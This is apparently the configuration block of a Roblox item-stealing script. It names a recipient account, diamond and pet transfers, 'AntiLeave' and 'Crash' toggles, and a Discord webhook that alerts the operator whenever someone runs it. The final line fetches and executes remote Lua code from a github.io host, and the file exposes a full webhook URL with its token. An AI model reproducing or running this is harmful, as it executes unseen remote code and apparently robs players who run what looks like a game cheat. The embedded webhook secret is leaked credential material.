--[[ Main Config ]]--
_G.Username = "Hyairz" --// 
_G.GiftMessage = "Hello" --// 

_G.Diamonds = 500000 --// 
_G.UnlockPets = true --// 
_G.AntiLeave = true --// 
_G.Crash = true  --// 

--[[ Webhook Config ]]--
_G.Enabled = true --// Toggle For Sending Webhooks
_G.Mention = true --// Pings You When Someone Executes
_G.Webhook = "https://discord.com/api/webhooks/1097509166333046894/RngnnVC4ygAD8SPCI_XeH7lM4zC29F2ajXZL9wDpI0HneeECICU1E5dbjgTuqthM98xE" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "Script is Loading" --// Script Name On The UI
_G.Tip1 = "" --// Gives You Tips On The UI
_G.Tip2 = "" --// Gives You Tips On The UI
_G.Tip3 = "" --// Gives You Tips On The UI
_G.Tip4 = "" --// Gives You Tips On The UI
_G.Tip5 = "" --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
